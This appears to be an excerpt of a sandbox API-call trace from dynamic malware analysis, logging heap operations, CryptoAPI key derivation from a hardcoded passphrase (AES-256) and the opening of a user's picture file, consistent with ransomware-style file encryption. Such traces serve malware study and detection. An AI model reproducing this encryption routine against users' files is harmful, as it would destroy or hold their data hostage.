[0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0092.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0092.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca358, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0092.604] CloseHandle (hObject=0x298) returned 1 [0092.604] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.604] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0092.604] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2e8c0, ftCreationTime.dwHighDateTime=0x1d5e92b, ftLastAccessTime.dwLowDateTime=0x172e55b0, ftLastAccessTime.dwHighDateTime=0x1d5ee4e, ftLastWriteTime.dwLowDateTime=0x172e55b0, ftLastWriteTime.dwHighDateTime=0x1d5ee4e, nFileSizeHigh=0x0, nFileSizeLow=0xc713, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="7yKccLuS8OBSzjABi0L.bmp", cAlternateFileName="7YKCCL~1.BMP")) returned 0x41ac640 [0092.604] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0092.604] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0092.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0092.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0092.605] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0092.605] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0092.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.645] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0092.645] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.645] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caca0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0092.645] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.646] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cac28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0092.646] CryptHashData (hHash=0x41ac100, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0092.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.646] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caaa8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0092.646] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac100, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac140) returned 1 [0092.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0092.647] CryptDestroyHash (hHash=0x41ac100) returned 1 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0092.648] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0092.648] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0092.648] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7ykcclus8obszjabi0l.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0092.649] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.649] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0092.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.649] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0092.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0092.650] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0092.650] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0092.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0092.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4508 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4508 | out: hHeap=0x1780000) returned 1 